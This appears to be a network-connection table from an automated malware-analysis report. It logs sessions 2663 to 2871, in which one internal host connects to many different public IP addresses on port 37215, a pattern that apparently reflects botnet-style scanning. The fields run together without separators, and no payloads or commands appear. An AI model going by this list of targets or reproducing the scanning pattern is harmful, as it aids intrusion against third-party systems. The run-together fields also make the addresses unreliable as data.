                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2663192.168.2.134342241.98.129.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2664192.168.2.1343792121.23.149.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2665192.168.2.135641241.70.163.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2666192.168.2.133727495.254.173.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2667192.168.2.1336250197.190.229.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2668192.168.2.1351180115.25.74.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2669192.168.2.1355850197.255.111.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2670192.168.2.134035241.44.44.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2671192.168.2.134639241.59.107.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2672192.168.2.1359308197.221.152.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2673192.168.2.135494238.234.103.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2674192.168.2.133770241.116.171.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2675192.168.2.134811478.59.60.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2676192.168.2.134649841.68.91.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2677192.168.2.1340036197.166.222.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2678192.168.2.1353032197.104.48.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2679192.168.2.136076088.250.168.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2680192.168.2.134391841.132.222.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2681192.168.2.1343040200.211.159.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2682192.168.2.1351002197.218.88.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2683192.168.2.135048641.110.165.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2684192.168.2.1355522157.193.36.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2685192.168.2.1342224197.128.164.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2686192.168.2.1357034157.221.237.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2687192.168.2.1338144197.115.121.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2688192.168.2.134641641.111.59.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2689192.168.2.134880644.170.151.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2690192.168.2.1346006157.28.29.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2691192.168.2.133354472.148.0.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2692192.168.2.1354402216.89.78.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2693192.168.2.1337050157.242.5.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2694192.168.2.135231441.254.127.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2695192.168.2.134540899.96.115.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2696192.168.2.135903241.159.187.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2697192.168.2.136026641.60.182.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2698192.168.2.133658441.176.176.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2699192.168.2.135134641.96.101.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2700192.168.2.133364641.188.137.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2701192.168.2.1342144157.142.151.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2702192.168.2.1333786157.167.252.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2703192.168.2.1356942157.16.211.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2704192.168.2.1354132197.199.118.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2705192.168.2.133912841.94.129.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2706192.168.2.1335868114.56.124.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2707192.168.2.134601061.55.46.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2708192.168.2.1347956147.120.57.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2709192.168.2.1349464157.242.242.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2710192.168.2.1346868197.182.253.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2711192.168.2.1360774157.61.39.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2712192.168.2.1333278176.218.166.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2713192.168.2.1345768186.200.157.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2714192.168.2.1358486145.251.168.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2715192.168.2.136072241.156.125.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2716192.168.2.1339248197.184.220.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2717192.168.2.1360150197.2.225.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2718192.168.2.1354668157.37.77.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2719192.168.2.1357668197.17.211.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2720192.168.2.1349388197.82.207.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2721192.168.2.134150641.232.60.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2722192.168.2.135777041.196.135.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2723192.168.2.1348440157.110.38.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2724192.168.2.133965641.62.62.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2725192.168.2.135545271.171.176.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2726192.168.2.136095041.67.32.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2727192.168.2.133311041.62.233.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2728192.168.2.1360310209.25.240.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2729192.168.2.1356336157.39.12.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2730192.168.2.134109441.241.134.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2731192.168.2.1345350197.38.231.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2732192.168.2.1360054197.31.53.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2733192.168.2.1335814190.86.162.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2734192.168.2.133415241.167.55.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2735192.168.2.135878041.242.222.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2736192.168.2.1344614197.24.125.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2737192.168.2.1356102157.43.241.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2738192.168.2.134581041.155.253.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2739192.168.2.135516641.14.204.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2740192.168.2.133710241.46.36.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2741192.168.2.1345724197.161.162.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2742192.168.2.1358284157.96.174.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2743192.168.2.1357984184.82.82.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2744192.168.2.1342004190.133.203.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2745192.168.2.1358084184.217.207.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2746192.168.2.1344940157.232.226.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2747192.168.2.135074041.213.78.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2748192.168.2.1341850197.228.28.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2749192.168.2.1354652157.100.97.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2750192.168.2.1349622143.56.254.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2751192.168.2.1345748157.72.154.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2752192.168.2.1354142204.109.34.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2753192.168.2.134521241.176.192.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2754192.168.2.1350322157.23.120.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2755192.168.2.134182241.152.214.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2756192.168.2.135345041.201.3.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2757192.168.2.134870441.251.34.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2758192.168.2.1358930157.161.94.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2759192.168.2.1356280197.243.230.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2760192.168.2.133579041.101.50.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2761192.168.2.134037041.163.167.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2762192.168.2.1344646157.66.149.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2763192.168.2.1351350157.190.50.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2764192.168.2.1353040197.131.159.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2765192.168.2.1338330126.43.91.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2766192.168.2.1356526104.82.150.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2767192.168.2.133792641.62.4.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2768192.168.2.133627641.227.25.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2769192.168.2.1337224197.108.190.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2770192.168.2.1344854129.111.93.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2771192.168.2.1351450143.161.167.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2772192.168.2.1338928197.28.78.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2773192.168.2.134119241.211.216.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2774192.168.2.1344018197.24.56.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2775192.168.2.1348502197.147.188.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2776192.168.2.134745863.5.182.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2777192.168.2.1348020197.6.171.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2778192.168.2.133467089.83.100.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2779192.168.2.1335586118.105.207.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2780192.168.2.133626241.125.202.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2781192.168.2.135031082.248.37.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2782192.168.2.1341476157.187.207.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2783192.168.2.1358564197.55.182.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2784192.168.2.134671841.131.22.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2785192.168.2.1358524157.255.71.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2786192.168.2.1334980197.43.36.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2787192.168.2.1336604197.200.182.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2788192.168.2.1349020156.103.79.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2789192.168.2.1334750157.31.39.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2790192.168.2.1359266157.114.28.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2791192.168.2.1337048197.119.82.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2792192.168.2.1345134197.232.47.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2793192.168.2.1355440157.171.241.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2794192.168.2.1358826197.135.145.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2795192.168.2.135255841.34.36.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2796192.168.2.134993270.35.219.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2797192.168.2.135281041.157.127.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2798192.168.2.1341614166.227.134.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2799192.168.2.1347018157.154.145.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2800192.168.2.1358876170.227.143.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2801192.168.2.133962241.48.182.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2802192.168.2.135716841.7.19.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2803192.168.2.1349626197.237.25.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2804192.168.2.134181041.99.78.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2805192.168.2.134128241.150.40.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2806192.168.2.1335410132.226.27.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2807192.168.2.1335566197.100.117.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2808192.168.2.134034041.165.164.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2809192.168.2.1349890197.186.62.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2810192.168.2.1357654177.159.187.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2811192.168.2.135579041.96.204.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2812192.168.2.1343220197.94.135.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2813192.168.2.1339194197.99.180.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2814192.168.2.1336056197.25.107.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2815192.168.2.1351576171.71.58.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2816192.168.2.1335810197.233.11.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2817192.168.2.135714441.197.30.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2818192.168.2.1344710110.5.237.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2819192.168.2.1339876197.217.148.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2820192.168.2.1351426157.225.26.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2821192.168.2.1356852197.190.162.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2822192.168.2.135574431.109.186.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2823192.168.2.1336994197.19.114.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2824192.168.2.133959441.109.85.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2825192.168.2.1359576223.240.124.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2826192.168.2.1352226197.13.176.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2827192.168.2.1337016164.83.215.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2828192.168.2.1354444174.13.55.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2829192.168.2.1351928191.217.83.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2830192.168.2.1342250197.28.197.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2831192.168.2.1336592112.44.143.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2832192.168.2.135524241.201.32.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2833192.168.2.133450244.225.193.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2834192.168.2.135932641.236.104.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2835192.168.2.1345182189.37.36.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2836192.168.2.1338530157.102.57.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2837192.168.2.134796441.54.81.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2838192.168.2.1354132168.207.224.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2839192.168.2.1350032197.32.43.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2840192.168.2.1348358174.154.198.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2841192.168.2.136093071.218.0.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2842192.168.2.1343822157.130.191.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2843192.168.2.1352490197.142.194.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2844192.168.2.1348404197.180.164.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2845192.168.2.1353516101.197.0.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2846192.168.2.134961871.248.255.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2847192.168.2.134755841.206.64.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2848192.168.2.134872873.200.172.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2849192.168.2.1356616197.72.93.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2850192.168.2.1349560197.206.221.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2851192.168.2.1354318157.51.8.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2852192.168.2.133600841.182.84.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2853192.168.2.133774441.44.205.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2854192.168.2.1359878197.147.107.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2855192.168.2.135965841.43.227.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2856192.168.2.1359384157.60.135.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2857192.168.2.134946839.243.213.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2858192.168.2.1349120217.197.101.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2859192.168.2.133645041.122.165.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2860192.168.2.133864041.74.82.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2861192.168.2.135584841.111.44.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2862192.168.2.1340218157.88.16.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2863192.168.2.1344200197.138.92.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2864192.168.2.1341642157.85.206.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2865192.168.2.1353484157.74.173.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2866192.168.2.1337546157.82.213.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2867192.168.2.1349396197.220.59.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2868192.168.2.135621641.169.27.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2869192.168.2.1340976157.149.238.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2870192.168.2.1351780157.235.114.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2871192.168.2.134781041.235.25.6137215
                                                  TimestampBytes transferredDirectionData


